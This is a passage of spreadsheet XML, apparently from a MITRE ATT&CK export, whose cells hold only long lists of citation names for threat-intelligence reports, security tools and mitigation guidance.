    <t>(Citation: KISA Operation Muzabi),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015),(Citation: Talos Olympic Destroyer 2018),(Citation: Amplia WCE),(Citation: ESET Sednit Part 2),(Citation: Talos PoetRAT April 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: FireEye APT33 Guardrail),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Trend Micro Emotet Jan 2019),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: NCC Group APT15 Alive and Strong),(Citation: Unit 42 Playbook Dec 2017),(Citation: RedCanary Mockingbird May 2020),(Citation: Cylance Cleaver),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Volexity Exchange Marauder March 2021),(Citation: PowerSploit Documentation),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Dell TG-3390),(Citation: Symantec WastedLocker June 2020),(Citation: Cybereason Oceanlotus May 2017),(Citation: US-CERT NotPetya 2017),(Citation: GitHub Pupy),(Citation: Cybereason Soft Cell June 2019),(Citation: Symantec Leafminer July 2018),(Citation: Symantec Whitefly March 2019),(Citation: FireEye APT35 2018),(Citation: Github PowerShell Empire),(Citation: CERT-FR PYSA April 2020),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: FireEye FIN6 April 2016),(Citation: Symantec Elfin Mar 2019),(Citation: FireEye APT39 Jan 2019),(Citation: FoxIT Wocao December 2019),(Citation: ESET Okrum July 2019),(Citation: BiZone Lizar May 2021),(Citation: ESET Bad Rabbit),(Citation: FireEye APT34 July 2019),(Citation: F-Secure CozyDuke),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: Microsoft GALLIUM December 2019),(Citation: Symantec MuddyWater Dec 2018),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Mandiant APT1),(Citation: ESET Telebots Dec 2016),(Citation: Deply Mimikatz),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Threatpost Lizar May 2021),(Citation: NCSC Joint Report Public Tools),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FireEye TRITON 2019),(Citation: Group IB APT 41 June 2021),(Citation: Symantec Buckeye),(Citation: Microsoft NICKEL December 2021),(Citation: Talos Nyetya June 2017),(Citation: GitHub PoshC2),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: ESET GreyEnergy Oct 2018),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: CISA AA20-301A Kimsuky),(Citation: GitHub LaZagne Dec 2018),(Citation: FireEye APT40 March 2019),(Citation: FireEye APT41 Aug 2019),(Citation: Microsoft HAFNIUM March 2020),(Citation: FireEye FIN6 Apr 2019),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Impacket Tools),(Citation: GitHub Mimikatz lsadump Module),(Citation: Trend Micro Muddy Water March 2021),(Citation: ESET Telebots June 2017),(Citation: Microsoft PLATINUM April 2016),(Citation: GitHub PowerSploit May 2012),(Citation: Symantec Tick Apr 2016),(Citation: Group IB Silence Sept 2018),(Citation: Microsoft WDigest Mit),(Citation: win10_asr),(Citation: Microsoft LSA),(Citation: GitHub SHB Credential Guard),(Citation: Microsoft Disable NTLM Nov 2012),(Citation: TechNet Credential Guard)</t>
  </si>
  <si>
    <t>(Citation: Cycraft Chimera April 2020),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Symantec Cicada November 2020),(Citation: LOLBAS Esentutl),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: FireEye FIN6 Apr 2019),(Citation: FireEye FIN6 April 2016),(Citation: Github Koadic),(Citation: Impacket Tools),(Citation: CME Github September 2018),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Volexity Exchange Marauder March 2021),(Citation: US-CERT TA18-074A),(Citation: Core Security Impacket),(Citation: Microsoft NICKEL December 2021),(Citation: Cary Esentutl),(Citation: NCC Group Chimera January 2021),(Citation: Metcalf 2015)</t>
  </si>
  <si>
    <t>(Citation: MimiPenguin GitHub May 2017),(Citation: GitHub LaZagne Dec 2018),</t>
  </si>
  <si>
    <t>(Citation: F-Secure CozyDuke),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: TrueSec Gsecdump),(Citation: Github AD-Pentest-Script),(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015),(Citation: F-Secure The Dukes),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Cybereason Soft Cell June 2019),(Citation: Mandiant APT1),(Citation: McAfee Night Dragon),(Citation: Symantec Backdoor.Mivast),(Citation: Wikipedia pwdump),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: FireEye APT33 Guardrail),(Citation: Deply Mimikatz),(Citation: Github Koadic),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Impacket Tools),(Citation: NCC Group APT15 Alive and Strong),(Citation: CME Github September 2018),(Citation: NCSC Joint Report Public Tools),(Citation: GitHub Mimikatz lsadump Module),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: US-CERT TA18-074A),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Dell TG-3390),(Citation: cobaltstrike manual),(Citation: CrowdStrike IceApple May 2022),(Citation: Microsoft Disable NTLM Nov 2012)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Reaver Nov 2017),(Citation: Trend Micro njRAT 2018),(Citation: TrendMicro Lazarus Nov 2018),(Citation: Talos Smoke Loader July 2018),(Citation: Talos PoetRAT April 2020),(Citation: ESET Gelsemium June 2021),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: Sophos Netwalker May 2020),(Citation: Trend Micro Emotet Jan 2019),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Fysbis Dr Web Analysis),(Citation: Unit 42 Playbook Dec 2017),(Citation: MSTIC FoggyWeb September 2021),(Citation: Symantec Darkmoon Aug 2005),(Citation: objsee mac malware 2017),(Citation: Tetra Defense Sodinokibi March 2020),(Citation: VirusBulletin Kimsuky October 2019),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Eset Ramsay May 2020),(Citation: Cylance Machete Mar 2017),(Citation: Palo Alto Comnie),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Proofpoint TA416 November 2020),(Citation: Trend Micro Waterbear December 2019),(Citation: DFIR Ryuk's Return October 2020),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: FireEye POSHSPY April 2017),(Citation: McAfee Night Dragon),(Citation: Securelist ScarCruft May 2019),(Citation: CoinTicker 2019),(Citation: Symantec Whitefly March 2019),(Citation: Cybereason Bazar July 2020),(Citation: Picus Sodinokibi January 2020),(Citation: ESET Operation Groundbait),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: GitHub Sliver C2),(Citation: Trend Micro KillDisk 1),(Citation: BlackBerry CostaRicto November 2020),(Citation: FireEye APT41 March 2020),(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: ESET Sednit Part 1),(Citation: Talos Frankenstein June 2019),(Citation: FireEye APT10 Sept 2018),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: ESET LightNeuron May 2019),(Citation: TrendMicro Netwalker May 2020),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: Kaspersky StoneDrill 2017),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Securelist APT10 March 2021),(Citation: Securelist Denis April 2017),(Citation: ESET Telebots Dec 2016),(Citation: ClearSky Lazarus Aug 2020),(Citation: Trend Micro Tick November 2019),(Citation: Emissary Trojan Feb 2016),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: ESET Sednit USBStealer 2014),(Citation: FireEye APT34 Dec 2017),(Citation: CheckPoint Naikon May 2020),(Citation: ESET ForSSHe December 2018),(Citation: McAfee Honeybee),(Citation: Talos Zeus Panda Nov 2017),(Citation: Unit 42 Kazuar May 2017),(Citation: CERT-EE Gamaredon January 2021),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Fortinet Agent Tesla April 2018),(Citation: FireEye APT19),(Citation: Symantec Buckeye),(Citation: Palo Alto DNS Requests),(Citation: FBI FLASH APT39 September 2020),(Citation: objective-see windtail2 jan 2019),(Citation: Unit 42 CARROTBAT November 2018),(Citation: FireEye FELIXROOT July 2018),(Citation: ESET Dukes October 2019),(Citation: Aqua TeamTNT August 2020),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Donut Github),(Citation: Unit 42 CARROTBAT January 2020),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Unit42 OilRig Nov 2018),(Citation: Talos Emotet Jan 2019),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Fidelis INOCNATION),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: ESET InvisiMole June 2018),(Citation: McAfee Lazarus Nov 2020),(Citation: ESET EvilNum July 2020),(Citation: Secureworks Karagany July 2019),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: CISA EB Aug 2020),(Citation: Intel 471 REvil March 2020),(Citation: Cylance Shell Crew Feb 2017),(Citation: TrendMicro EarthLusca 2022),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Rewterz Sidewinder APT April 2020),(Citation: Mandiant APT1 Appendix),(Citation: Lazarus APT January 2022),(Citation: Malwarebytes SmokeLoader 2016),(Citation: ESET TeleBots Oct 2018),(Citation: Bitdefender StrongPity June 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Talos MuddyWater Jan 2022),(Citation: FireEye Hancitor),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Cycraft Chimera April 2020),(Citation: Talos Promethium June 2020),(Citation: FireEye NETWIRE March 2019),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: ESET Emotet Dec 2018),(Citation: Unit 42 VERMIN Jan 2018),(Citation: ThreatConnect Kimsuky September 2020),(Citation: Lotus Blossom Dec 2015),(Citation: FireEye Ransomware Feb 2020),(Citation: Github PowerShell Empire),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Bitdefender APT28 Dec 2015),(Citation: Unit 42 Valak July 2020),(Citation: McAfee Sodinokibi October 2019),(Citation: Novetta Winnti April 2015),(Citation: CISA Supernova Jan 2021),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: Symantec Remsec IOCs),(Citation: CitizenLab KeyBoy Nov 2016),(Citation: Anomali Rocke March 2019),(Citation: Chronicle Winnti for Linux May 2019),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: Cyble Sidewinder September 2020),(Citation: Novetta Blockbuster RATs),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Bishop Fox Sliver Framework August 2019),(Citation: Palo Alto Sofacy 06-2018),(Citation: Malwarebytes Higaisa 2020),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: Cybereason Conti Jan 2021),(Citation: Unit 42 Sofacy Feb 2018),(Citation: Talos Group123),(Citation: Talos Kimsuky Nov 2021),(Citation: Sophos SamSam Apr 2018),(Citation: ESET Grandoreiro April 2020),(Citation: Cyber Forensicator Silence Jan 2019),(Citation: Cybereason Cobalt Kitty 2017),(Citation: iSight Sandworm Oct 2014),(Citation: Prevailion DarkWatchman 2021),(Citation: Bitdefender FIN8 July 2021),(Citation: ATT Sidewinder January 2021),(Citation: MacKeeper Bundlore Apr 2019),(Citation: NCC Group WastedLocker June 2020),(Citation: Unit 42 Siloscape Jun 2021),(Citation: Unit 42 Bisonal July 2018),(Citation: ESET Industroyer),(Citation: Symantec RAINDROP January 2021),(Citation: FireEye HAWKBALL Jun 2019),(Citation: McAfee Sharpshooter December 2018),(Citation: ANSSI Sandworm January 2021),(Citation: F-Secure Sofacy 2015),(Citation: ESET Attor Oct 2019),(Citation: Trend Micro TeamTNT),(Citation: Cybereason Kimsuky November 2020),(Citation: McAfee Cuba April 2021),(Citation: ESET GreyEnergy Oct 2018),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Talos Seduploader Oct 2017),(Citation: ESET Lazarus Jun 2020),(Citation: ESET ComRAT May 2020),(Citation: Secureworks REvil September 2019),(Citation: DustySky),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: Kaspersky Lyceum October 2021),(Citation: Checkpoint Dridex Jan 2021),(Citation: Talos Cobalt Group July 2018),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Symantec Frutas Feb 2013),(Citation: Group IB Ransomware May 2020),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: Palo Alto OilRig May 2016),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: Morphisec Cobalt Gang Oct 2018),(Citation: Cyberreason Anchor December 2019),(Citation: US-CERT Volgmer 2 Nov 2017),(Citation: Securelist Darkhotel Aug 2015),(Citation: CarbonBlack Conti July 2020),(Citation: McAfee Lazarus Jul 2020),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Symantec Gallmaker Oct 2018),(Citation: McAfee Maze March 2020),(Citation: Proofpoint TA505 Jan 2019),(Citation: Securelist ShadowPad Aug 2017),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: ESET OceanLotus Mar 2019),(Citation: Symantec Cicada November 2020),(Citation: Cybereason Valak May 2020),(Citation: Malwarebytes Agent Tesla April 2020),(Citation: ClearSky MuddyWater Nov 2018),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: Unit 42 Nokki Oct 2018),(Citation: ESET OceanLotus),(Citation: Crowdstrike Indrik November 2018),(Citation: FireEye APT33 Guardrail),(Citation: Microsoft FinFisher March 2018),(Citation: fsecure NanHaiShu July 2016),(Citation: Secureworks MCMD July 2019),(Citation: Securelist WhiteBear Aug 2017),(Citation: Leonardo Turla Penquin May 2020),(Citation: ESET RTM Feb 2017),(Citation: RedCanary Mockingbird May 2020),(Citation: FireEye Periscope March 2018),(Citation: PowerSploit Documentation),(Citation: ESET Gamaredon June 2020),(Citation: Dell TG-3390),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Symantec Ukraine Wipers February 2022),(Citation: Cybereason Oceanlotus May 2017),(Citation: Deep Instinct TA505 Apr 2019),(Citation: Dell Sakula),(Citation: Threatpost Hancitor),(Citation: ESET Hermetic Wizard March 2022),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Unit 42 OilRig Sept 2018),(Citation: Malwarebytes Kimsuky June 2021),(Citation: GitHub Invoke-Obfuscation),(Citation: TrendMicro TropicTrooper 2015),(Citation: Palo Alto CVE-2015-3113 July 2015),(Citation: ESET LoudMiner June 2019),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Cisco H1N1 Part 1),(Citation: Cybereason Bumblebee August 2022),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Arxiv Avaddon Feb 2021),(Citation: Accenture Lyceum Targets November 2021),(Citation: FireEye APT29 Nov 2018),(Citation: TrendMicro MacOS April 2018),(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Accenture HyperStack October 2020),(Citation: FireEye FIN7 Oct 2019),(Citation: SentinelOne Valak June 2020),(Citation: Securelist BlackOasis Oct 2017),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Malwarebytes Pony April 2016),(Citation: CrowdStrike IceApple May 2022),(Citation: Trend Micro Skidmap),(Citation: Proofpoint TA505 October 2019),(Citation: Qualys LolZarus),(Citation: Talos PoetRAT October 2020),(Citation: FinFisher Citation),(Citation: NTT Security Flagpro new December 2021),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: Checkpoint IndigoZebra July 2021),(Citation: NCC Group Team9 June 2020),(Citation: OilRig New Delivery Oct 2017),(Citation: Accenture Hogfish April 2018),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: ClearSky MuddyWater June 2019),(Citation: Talos Remcos Aug 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Novetta Blockbuster Loaders),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Securelist MuddyWater Oct 2018),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: ESET Carbon Mar 2017),(Citation: Citizen Lab Group5),(Citation: FireEye Obfuscation June 2017),(Citation: Symantec Security Center Trojan.Kwampirs),(Citation: Recorded Future REDDELTA July 2020),(Citation: Bitdefender Naikon April 2021),(Citation: Cyberint Qakbot May 2021),(Citation: S2 Grupo TrickBot June 2017),(Citation: Talos Cobalt Strike September 2020),(Citation: Juniper IcedID June 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Trustwave GoldenSpy2 June 2020),(Citation: Novetta-Axiom),(Citation: US-CERT TYPEFRAME June 2018),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: Securelist LuckyMouse June 2018),(Citation: SecureWorks August 2019),(Citation: FireEye CARBANAK June 2017),(Citation: Group IB GrimAgent July 2021),(Citation: Intezer HiddenWasp Map 2019),(Citation: Visa FIN6 Feb 2019),(Citation: Microsoft PLATINUM April 2016),(Citation: Prevx Carberp March 2011),(Citation: Unit 42 KerrDown February 2019),(Citation: FireEye APT28),(Citation: Microsoft DUBNIUM July 2016),(Citation: Check Point Sunburst Teardrop December 2020),(Citation: PaloAlto DNS Requests May 2016),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Lotus Blossom Jun 2015),(Citation: Carbon Black HotCroissant April 2020),(Citation: Cybereason Astaroth Feb 2019),(Citation: NCC Group Fivehands June 2021),(Citation: Talos SamSam Jan 2018),(Citation: ESET Casbaneiro Oct 2019),(Citation: BlackBerry Bahamut),(Citation: ESET Sednit Part 2),(Citation: Talos GravityRAT),(Citation: ProofPoint Ursnif Aug 2016),(Citation: FireEye Clandestine Wolf),(Citation: Kaspersky Lab SynAck May 2018),(Citation: Unit 42 Gamaredon February 2022),(Citation: ClearSky Siamesekitten August 2021),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: Kaspersky Turla),(Citation: FireEye FiveHands April 2021),(Citation: ESET Kobalos Feb 2021),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: CopyKittens Nov 2015),(Citation: Trustwave Pillowmint June 2020),(Citation: ESET OceanLotus macOS April 2019),(Citation: jRAT Symantec Aug 2018),(Citation: Trend Micro Conficker),(Citation: Cisco Ukraine Wipers January 2022),(Citation: CISA SoreFang July 2016),(Citation: Crowdstrike Helix Kitten Nov 2018),(Citation: Cybereason Soft Cell June 2019),(Citation: Symantec Leafminer July 2018),(Citation: Malwarebytes Konni Aug 2021),(Citation: CISA AppleJeus Feb 2021),(Citation: Unit 42 BackConfig May 2020),(Citation: G Data Sodinokibi June 2019),(Citation: Symantec Elderwood Sept 2012),(Citation: Talos Bisonal Mar 2020),(Citation: Fortinet Diavol July 2021),(Citation: Unit 42 NOKKI Sept 2018),(Citation: Symantec Shuckworm January 2022),(Citation: CrowdStrike Putter Panda),(Citation: FoxIT Wocao December 2019),(Citation: FireEye FIN7 Aug 2018),(Citation: FireEye MuddyWater Mar 2018),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: F-Secure CozyDuke),(Citation: Bromium Ursnif Mar 2017),(Citation: ESET Turla PowerShell May 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Morphisec ShellTea June 2019),(Citation: Kaspersky Sofacy),(Citation: NSA/FBI Drovorub August 2020),(Citation: Medium S2W WhisperGate January 2022),(Citation: Medium Metamorfo Apr 2020),(Citation: FireEye APT32 May 2017),(Citation: PaloAlto NanoCore Feb 2016),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Unit42 Redaman January 2019),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: TrendMicro macOS Dacls May 2020),(Citation: CISA ComRAT Oct 2020),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: ESET Machete July 2019),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Proofpoint TA505 Sep 2017),(Citation: Zscaler Higaisa 2020),(Citation: Unit42 Emissary Panda May 2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Microsoft NICKEL December 2021),(Citation: Picus Emotet Dec 2018),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Kaspersky TajMahal April 2019),(Citation: Cybereason TA505 April 2019),(Citation: Qualys Hermetic Wiper March 2022),(Citation: Flashpoint FIN 7 March 2019),(Citation: ASERT InnaputRAT April 2018),(Citation: GDATA Zeus Panda June 2017),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Novetta Blockbuster),(Citation: ESET Ebury Feb 2014),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: Talos Micropsia June 2017),(Citation: FireEye Fin8 May 2016),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Proofpoint ZeroT Feb 2017),(Citation: Unit 42 Hildegard Malware),(Citation: ESET Operation Spalax Jan 2021),(Citation: PaloAlto UBoatRAT Nov 2017),(Citation: Kaspersky MoleRATs April 2019),(Citation: Microsoft Actinium February 2022),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: BlackBerry Amadey 2020),(Citation: Talos MuddyWater May 2019),(Citation: FOX-IT May 2016 Mofang),(Citation: ESET PipeMon May 2020),(Citation: Trend Micro Muddy Water March 2021),(Citation: Unit42 BendyBear Feb 2021),(Citation: Securelist Remexi Jan 2019),(Citation: Radware Micropsia July 2018),(Citation: Palo Alto Shamoon Nov 2016),(Citation: GitHub PowerSploit May 2012),(Citation: Trend Micro Daserf Nov 2017),(Citation: ESET InvisiMole June 2020),(Citation: Forcepoint Monsoon),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: Infoblox Lokibot January 2019),(Citation: win10_asr),(Citation: Microsoft AMSI June 2015)</t>
  </si>
  <si>
    <t>(Citation: Haq 2014),(Citation: FireEye APT28),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: Avira Mustang Panda January 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: ESET Dukes October 2019),(Citation: Carbon Black HotCroissant April 2020),(Citation: FinFisher Citation),(Citation: ESET OceanLotus Mar 2019),(Citation: Palo Alto Comnie),(Citation: Trend Micro Qakbot May 2020),(Citation: Talos Bisonal Mar 2020),(Citation: ESET OceanLotus),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: ESET Sednit Part 2),(Citation: Proofpoint ZeroT Feb 2017),(Citation: Sophos SamSam Apr 2018),(Citation: Emissary Trojan Feb 2016),(Citation: Trend Micro Tick November 2019),(Citation: ESET Grandoreiro April 2020),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: ESET Gelsemium June 2021),(Citation: Symantec Orangeworm April 2018),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Microsoft FinFisher March 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: NCC Group WastedLocker June 2020),(Citation: Proofpoint Leviathan Oct 2017),(Citation: ASERT Donot March 2018),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Group IB GrimAgent July 2021),(Citation: SentinelOne NobleBaron June 2021),(Citation: Zscaler Higaisa 2020),(Citation: BlackBerry CostaRicto November 2020),(Citation: Group IB Ransomware September 2020),(Citation: ESET Gamaredon June 2020),(Citation: McAfee Maze March 2020),</t>
  </si>
  <si>
    <t>(Citation: ClearSky MuddyWater Nov 2018),(Citation: Prevailion DarkWatchman 2021),(Citation: Anomali Rocke March 2019),(Citation: ESET Gamaredon June 2020),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Trend Micro njRAT 2018),(Citation: MSTIC FoggyWeb September 2021),</t>
  </si>
  <si>
    <t>(Citation: Microsoft Actinium February 2022),(Citation: Lazarus APT January 2022),(Citation: Cybereason Bazar July 2020),(Citation: NCC Group Team9 June 2020),</t>
  </si>
  <si>
    <t>(Citation: Securelist Dtrack),(Citation: CISA ComRAT Oct 2020),(Citation: GitHub PSImage),(Citation: FireEye SMOKEDHAM June 2021),(Citation: SentinelLabs reversing run-only applescripts 2021),(Citation: ESET ComRAT May 2020),(Citation: win10_asr)</t>
  </si>
  <si>
    <t>(Citation: MSTIC Nobelium Toolset May 2021),(Citation: ESET T3 Threat Report 2021),</t>
  </si>
  <si>
    <t>(Citation: Cyberint Qakbot May 2021),(Citation: Trend Micro Waterbear December 2019),(Citation: FireEye TEMP.Veles 2018),(Citation: Palo Alto OilRig April 2017),(Citation: Cybereason Soft Cell June 2019),(Citation: APT3 Adversary Emulation Plan),(Citation: Talos GravityRAT),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Symantec Black Vine),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: ESET Gazer Aug 2017),(Citation: Leonardo Turla Penquin May 2020),(Citation: Unit42 OilRig Nov 2018),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: PowerSploit Documentation),(Citation: GitHub PowerSploit May 2012),(Citation: Crowdstrike Qakbot October 2020),(Citation: Trend Micro Daserf Nov 2017),(Citation: ESET InvisiMole June 2020),(Citation: cobaltstrike manual),</t>
  </si>
  <si>
    <t>(Citation: McAfee Lazarus Nov 2020),(Citation: Kaspersky Tomiris Sep 2021),(Citation: Secureworks Karagany July 2019),(Citation: Carbon Black HotCroissant April 2020),(Citation: Dragos Crashoverride 2018),(Citation: Cybereason Astaroth Feb 2019),(Citation: APT3 Adversary Emulation Plan),(Citation: Unit42 Sofacy Dec 2018),(Citation: FireEye Clandestine Wolf),(Citation: Trend Micro Emotet Jan 2019),(Citation: Securelist Dropping Elephant),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Medium Babuk February 2021),(Citation: Malwarebytes KONNI Evolves Jan 2022),(Citation: Unit 42 Rocke January 2019),(Citation: ESET OceanLotus macOS April 2019),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Mandiant No Easy Breach),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Cybereason Soft Cell June 2019),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Symantec Elderwood Sept 2012),(Citation: Talos Bisonal Mar 2020),(Citation: McAfee Night Dragon),(Citation: Malwarebytes Dyreza November 2015),(Citation: Cisco H1N1 Part 1),(Citation: Talos Rocke August 2018),(Citation: Cybereason Bazar July 2020),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: FireEye APT39 Jan 2019),(Citation: NHS Digital Egregor Nov 2020),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Cylance Dust Storm),(Citation: IBM TA505 April 2020),(Citation: Unit42 Molerat Mar 2020),(Citation: SentinelOne Valak June 2020),(Citation: Anomali Rocke March 2019),(Citation: BlackBerry CostaRicto November 2020),(Citation: Securelist BlackOasis Oct 2017),(Citation: Lee 2013),(Citation: Mcafee Clop Aug 2019),(Citation: Check Point APT31 February 2021),(Citation: Trend Micro DRBControl February 2020),(Citation: Cylance Shaheen Nov 2018),(Citation: Cyble Egregor Oct 2020),(Citation: FinFisher Citation),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Unit 42 Lucifer June 2020),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Securelist APT10 March 2021),(Citation: Red Canary NETWIRE January 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Malwarebytes DarkComet March 2018),(Citation: ESET Machete July 2019),(Citation: Symantec RAINDROP January 2021),(Citation: Symantec Dragonfly),(Citation: Cybereason Clop Dec 2020),(Citation: Trend Micro TeamTNT),(Citation: Cybereason Kimsuky November 2020),(Citation: McAfee Cuba April 2021),(Citation: ESET Dukes October 2019),(Citation: Cyberint Qakbot May 2021),(Citation: BitDefender Chafer May 2020),(Citation: ESET GreyEnergy Oct 2018),(Citation: S2 Grupo TrickBot June 2017),(Citation: hexed osx.dok analysis 2019),(Citation: Juniper IcedID June 2020),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Proofpoint ZeroT Feb 2017),(Citation: Unit 42 Hildegard Malware),(Citation: ESET Operation Spalax Jan 2021),(Citation: Symantec Waterbug),(Citation: Zscaler Bazar September 2020),(Citation: Unit 42 SeaDuke 2015),(Citation: Donut Github),(Citation: Kaspersky Adwind Feb 2016),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: FOX-IT May 2016 Mofang),(Citation: FireEye APT38 Oct 2018),(Citation: ASERT Donot March 2018),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: Cyberreason Anchor December 2019),(Citation: Trend Micro Daserf Nov 2017),(Citation: McAfee Babuk February 2021),(Citation: Infoblox Lokibot January 2019),</t>
  </si>
  <si>
